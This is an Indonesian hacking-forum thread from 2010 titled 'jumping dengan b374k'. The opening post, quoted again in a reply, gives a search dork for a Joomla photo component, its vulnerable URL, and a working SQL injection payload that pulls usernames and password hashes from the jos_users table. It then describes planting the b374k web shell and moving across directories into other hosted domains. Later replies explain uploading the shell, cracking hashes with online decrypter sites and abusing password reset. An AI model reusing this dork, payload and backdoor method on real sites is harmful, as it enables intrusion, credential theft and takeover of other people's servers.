Page 1 of 3
jumping dengan b374k
Posted: Thu Jul 01, 2010 11:34 am
by anharku
hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com |
http://anharku.tk |
http://anharku.us
Re: jumping dengan b374k
Posted: Thu Jul 01, 2010 2:30 pm
by warxdoyo
anharku wrote:hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com http://anharku.tk |
http://anharku.us
bisa ajar`n saya gak??kaya`n bagus tuh..... :kaca: :kaca:
Re: jumping dengan b374k
Posted: Thu Jul 01, 2010 3:10 pm
by anharku
saya juga lagi belajar...
dicoba2 saja itu dork dan exploit nya :circle:
Re: jumping dengan b374k
Posted: Thu Jul 01, 2010 6:45 pm
by RJ-45
Terima kasih kakak..................!
Re: jumping dengan b374k
Posted: Thu Jul 01, 2010 11:00 pm
by anharku
ia sama2,.... :love:
Re: jumping dengan b374k
Posted: Fri Jul 02, 2010 12:48 am
by RJ-45
Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:
Re: jumping dengan b374k
Posted: Fri Jul 02, 2010 9:26 am
by anharku
cara pasangnya kan tinggal di upload ke server terus di panggil alamat URL nya :circle:
Re: jumping dengan b374k
Posted: Fri Jul 02, 2010 9:34 am
by warxdoyo
RJ-45 wrote:Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:
saya bingung cara masuknya neh RJ tp kalo masang shell saya tau,,,,,,, :pusing:: :pusing: :pusing: :pusing: :pusing: pusing: :pusing: :pusing: :pusing: :pusing:
Re: jumping dengan b374k
Posted: Fri Jul 02, 2010 10:14 am
by anharku
cara masuknya banyak kok..
intinya kamu harus punya akses sebagai administrator...
banyak cara kok...cari errornya terus munculin user passwordnya..
paswordnya biasanya masih encrypt'an jd harus di decrypt..
buat nge-decrypt banyak kok web penyedia jasa decript
seperti:
http://hashchecker.de
http://md5decrypter.co.uk
teknik yg lain kalau di joomla yagh reset password...
yang penting kamu masuk ke CMS nya terus upload shell atau BD b3j4k..
ga ada yg praktis sih semua butuh tahap dan pembelajaran...
ga cuma itu caranya kembangin sendiri dan kamu akan menemukan seni dalam dunia hacking :devil
just... membagi ilmu dari newbie :circle:
Re: jumping dengan b374k
Posted: Sun Jul 04, 2010 9:40 am
by Darkzzzz
Saya juga lagi belajar ...